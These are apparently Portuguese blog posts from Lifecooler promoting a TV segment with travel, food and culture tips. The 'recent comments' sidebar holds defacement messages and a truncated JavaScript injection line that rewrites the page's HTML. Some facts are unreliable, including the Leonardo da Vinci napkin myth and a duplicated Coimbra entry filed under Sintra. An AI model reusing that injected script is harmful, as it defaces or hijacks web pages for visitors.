Lifecooler @ 18:35

Ter, 07/05/13

A Europa é um território de história riquíssima quanto às artes da mesa.


Sabia que o guardanapo foi inventado por Leonardo da Vinci, quando comia pasta? E que o “couvert” foi criado em França, significando as entradas cobertas por um pano por questões de higiene?


E que os canapés eram pequenas entradas que, como o nome indica, poderiam ser comidas na sala de estar, junto ao canapé (um móvel de assento)?

 

Então não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

E se não viu. veja o vídeo aqui!

 


Tags:


Lifecooler @ 18:33

Ter, 02/04/13

Sabe o que é?

 

O termo "Turismo Industrial" refere-se ao ato dos empreendedores abrirem as suas instalações para grupos de pessoas interessadas em conhecer a estrutura das unidades produtivas, a forma de produção e a tecnologia empregada.

As visitas são sistematizadas através de roteiros específicos com dias e horários agendados. Os empresários criam espaços onde os turistas podem circular dentro das unidades, onde dão a conhecer o processo produtivo.

 

Curiosa!?!

 

Então visite a página oficial desta modalidade. www.turismoindustrial.cm-sjm.pt

 

E claro, não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

E esteja atenta às outras novidades de uma vida  mais cooler!

 

E se não viu. Veja o vídeo aqui!

 





Tags:


Lifecooler @ 18:31

Ter, 05/03/13

Dia 20 de Março é o Dia Internacional do Contador de Histórias, pretexto ideal para nos deixarmos levar pelas várias narrativas que o país tem para oferecer. Há eventos de contadores de histórias em bares e teatros do país, e já há vários festivais dedicados ao tema, mas há propostas que se relacionam com este universo das histórias e que podem levar-nos por várias formas de ver as histórias.

Seja sob a forma de um hotel de charme que se chama Casa do Conto e tem algo da história do Porto lá dentro, seja através de sessões de teatro que nos contam histórias em 15 minutos, ou um festival de filmes de animação em Lisboa, ou ainda uma livraria itinerante que leva as suas histórias aos mais novos, não perca a oportunidade de lhe contarem um conto que acrescenta vários pontos ao seu tempo livre.

Curiosa!?!

 

Então não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


Lifecooler @ 18:31

Ter, 05/02/13

Para este mês de Fevereiro, mês do amor e do carnaval, francisco Gomes traz-lhe o roteiro mais romãntico!

 

1 – ROMANCE NA QUINTA DA MARINHA
HOTEL DE LUXO – 5 estrelas
Hotel Quinta da Marinha Resort
Onde: Quinta da Marinha - Cascais

Uma noite de luxo, para momentos especiais no meio de vários elementos (mar, campo, serra) e perto de Lisboa.
Entre Cascais, o azul do Oceano do Guincho e o verde da serra de Sintra venha conhecer um refúgio de tranquilidade e romantismo.

Situado na Quinta da Marinha rodeado por belos jardins e por um extenso pinhal, o 5 estrelas Hotel Quinta da Marinha Resort integra-se harmoniosamente na paisagem envolvente. Interior e exterior misturam-se em ambientes de água, mar, lagos e piscinas e da vegetação, da serra e do golfe.


2 – Sabores da América do Sul no único Restaurante Peruano em Portugal

QOSQO
Onde: Lisboa

O Qosqo abriu portas em julho do ano passado com uma ementa de petiscos escrita a giz, para mais facilmente variar ao sabor das vontades do chefe e da disponibilidade dos alimentos, muitos importados, ou da frescura do peixe. Mas agora há ementa fixa, pratos quentes e uma nova chefe, Sara Zegarra acabada de chegar do Peru há 4 semanas para manter a genuinidade dos sabores dos Andes.         
Os individuais de padrões andinos dão o mote decorativo e a sala principal é dominada pelo cenário grandioso de Machu Pichu, que ocupa totalmente uma das paredes.
3 – Destinos românticos de Portugal

Sem preconceitos de sermos pirosos, queques ou vanguardistas, resolvemos dar uma ajuda ao Cupido deixando aqui algumas dicas para alegrar o seu 14 de fevereiro e, já agora, o resto do ano...  

SINTRA
Pela primeira vez aberta ao público, o conjunto patrimonial do Chalet e Jardim da Condessa d´Edla, integrado no Parque da Pena, é visitável desde Maio de 2011. Após longas e profundas obras de restauro, que devolveram a este refúgio sintrense todo o seu caráter romântico e cénico, é possível agora desfrutar deste património. O Chalet é um edifício do séc. XIX, de traça romântica, mandado construir pelo rei D. Fernando II para a sua segunda mulher, Elise Hensler, Condessa d´Edla, um local de refúgio para si e para a sua amada. O chalé foi inspirado nas construções da região dos Alpes.


O projeto de reconstrução teve como objetivo devolver ao Chalet o seu estado original, incluindo o restauro e a reintegração dos elementos que resistiram à ruína. O portão e a Casa do Guarda do Chalet foram também objeto de recuperação, sendo aqui que funciona o acolhimento dos visitantes e o centro de interpretação ambiental.
Quinta das Lágrimas – palácio, atualmente convertido em hotel, inserido num cenário de grande beleza, onde ainda vivem memórias dos amores entre o príncipe Dom Pedro e a bela Dona Inês. A quinta mantém intacta a atmosfera romântica de outros tempos. Conta-se que foi aqui que Dona Inês de Castro viu a morte, através dos punhais dos fidalgos, a quem o rei Dom Afonso IV encomendou a sua morte. O local onde morreu foi designado por Fonte das Lágrimas pelo poeta Luís de Camões. (Imóvel de Interesse Público).

Trata-se do primeiro jardim medieval totalmente reconstruído em Portugal, tendo como fonte de inspiração iluminuras, tapeçarias e literatura da época.


Museu Regional de Beja / Museu Rainha Dona Leonor – Antigo Convento de Nossa Senhora da Conceição de onde Soror Mariana Alcoforado aí em clausura via passar o Marquês de Chamilly e assistia às manobras do exército (cerca de 1667 e 1668). Mariana Alcoforado é considerada a autora das cinco Lettres Portugaises (As Cartas Portuguesas) dirigidas ao Marquês Noel Bouton de Chamilly, Conde de Saint-Léger e oficial francês, que lutou em solo português sob as ordens de Frederico de Schomberg, durante a Guerra da Restauração. A sua obra Cartas Portuguesas tornou-se num famoso clássico da literatura universal.

 

COIMBRA
Quinta das Lágrimas – palácio, atualmente convertido em hotel, inserido num cenário de grande beleza, onde ainda vivem memórias dos amores entre o príncipe Dom Pedro e a bela Dona Inês. A quinta mantém intacta a atmosfera romântica de outros tempos. Conta-se que foi aqui que Dona Inês de Castro viu a morte, através dos punhais dos fidalgos, a quem o rei Dom Afonso IV encomendou a sua morte. O local onde morreu foi designado por Fonte das Lágrimas pelo poeta Luís de Camões. (Imóvel de Interesse Público).

Trata-se do primeiro jardim medieval totalmente reconstruído em Portugal, tendo como fonte de inspiração iluminuras, tapeçarias e literatura da época.

 

Curiosa!?! Então não perca no Mais Mulher desta quarta-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


Lifecooler @ 18:32

Ter, 08/01/13

Diz a lenda que o chá foi inventado quando um imperador chinês experimentou beber o resultado de uma folha de arbusto que caíra acidentalmente em água a ferver. Mais de 5000 anos depois, esta, que é uma das bebidas mais consumidas em todo o mundo, é apreciada a qualquer hora do dia, quente ou fria.


As páginas de História teimam em esquecer, mas é sempre bom sublinhar que a inserção do chá nas cortes europeias deve-se à portuguesíssima Catarina de Bragança. Depois de ter casado com o monarca britânico Carlos II, a rainha cultivou em Inglaterra o hábito do famoso “Chá das Cinco”.
Vários estudos desenvolvidos ao longo dos tempos têm demonstrado os benefícios medicinais desta bebida, tanto calmantes como estimulantes.

 

E em Portugal não faltam locais para experimentar esta deliciosa bebida de 5 milénios, tal como a Fábrica de Chá Porto Formoso e a Fábrica de Chá Gorreana nos Açores. Ou Umami Tea que é uma loja única para apaixonados pelo mundo do chá e onde se podem encontrar vários conjuntos de bules e chávenas originais, bem como alguns acessórios complementares ao universo do chá.

E muitos outros locais que lhe revelare-mos no Mais Mulher desta quarta-feira!

 

Às 17:30, na SIC Mulher...

 

Veja o vídeo aqui!


Tags:


Lifecooler @ 18:33

Ter, 04/12/12

Se quer organizar os seus tempos livres, então inspire-se na conversa com Francisco Gomes, e a rubrica LifeCooler. Na qual vamos falar da vila do natal de Óbitos, da aldeia do natal dos prepépios de sal e do coolares market.

 

Mas também dos mistérios de natal e do bazar natalicio de serralves!

 

Não perca nada sobre estas novidades natalicias no Mais Mulher, na Sic Mulher às 17:30!

 

Veja o vídeo aqui!


Tags:


Lifecooler @ 18:03

Ter, 06/11/12

Portugal é um país atlântico com tradição secular nas conservas. O sector conserveiro foi um dos maiores exportadores do século passado. Eram centenas de fábricas, hoje são 20. Mas ao lado das ruínas ainda há resistentes. E Portugal parece despertar de novo para as conservas a ponto de alguns dos chefes mais badalados já as introduzirem em algumas das suas criações.

São várias as razões para este ressurgimento. Em primeiro lugar, as vantagens alimentares: Fonte natural de proteínas, vitaminas, minerais e ácidos gordos essenciais ao organismo, o peixe enlatado mantém o teor de proteína e apresenta quantidades superiores de cálcio – um benefício do processamento térmico ao amaciar as pequenas espinhas de forma a poderem ser digeridas. A sardinha em conserva, por exemplo, contém um teor de cálcio até 10 vezes superior ao produto fresco ou congelado.

Começam a surgir espaços que comercializam este tipo de produto para consumo no local e até livros de receitas criativas que utilizam as conservas como elemento principal.

Enguias, carapau, truta, ovas, berbigão, caramujos, lapas, lulas, mexilhão e polvo são exemplos de peixes e moluscos que se encontram em conserva.

Produto que se cruza com o gourmet e o design (ver por exemplo o peixe-espada preto de Sesimbra que se começou a comercializar em 2011), mantém o seu carácter popular mas com um toque refinado.

 

Vale a pena fazer um roteiro por restaurantes com o tema, casas de petiscos que editam livros de receitas, museus instalados em antigas fábricas de conservas e que ganham prémios europeus e muito mais.

 

Veja o vídeo aqui!


Tags:


Lifecooler @ 19:10

Ter, 02/10/12

O azulejo é uma das produções mais originais da cultura e arte portuguesa.

A palavra azulejo tem origem no árabe azzelij (ou al zuleycha, al zuléija, al zulaiju, al zulaco) que significa pequena pedra polida.

Desde há cinco séculos que a azulejaria ocupa uma posição de relevo entre as artes decorativas portuguesas e na arquitetura. Foram os árabes que levaram a arte do azulejo para a Espanha e de lá se difundiu por toda a Europa.

Os temas neles pintados oscilam entre os relatos de episódios históricos, cenas mitológicas, iconografia religiosa e uma extensa gama de elementos decorativos (geométricos, vegetalistas etc) aplicados a parede, pavimentos e tectos de palácios, jardins, edifícios religiosos e de habitação.

A melhor maneira de conhecer esta bela e singular forma de arte tradicional Portuguesa é visitar o museu, andar de comboio por algumas estações artísticas, pernoitar em hotéis ricos nesta arte e, porque não, meter mãos a à obra e decorar os nossos próprios azulejos.

 

 

www.lifecooler.com

 

Veja o vídeo aqui!

 


Tags:


Lifecooler @ 19:09

Ter, 02/10/12

Francisco Gomes é director de Marketing da Lifecooler
Trabalha no Lifecooler com entusiasmo há 7 anos.
É o responsável de comunicação e marketing da empresa e tem uma paixão por partilhar o melhor de Portugal com os amigos e clientes

www.lifecooler.com



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO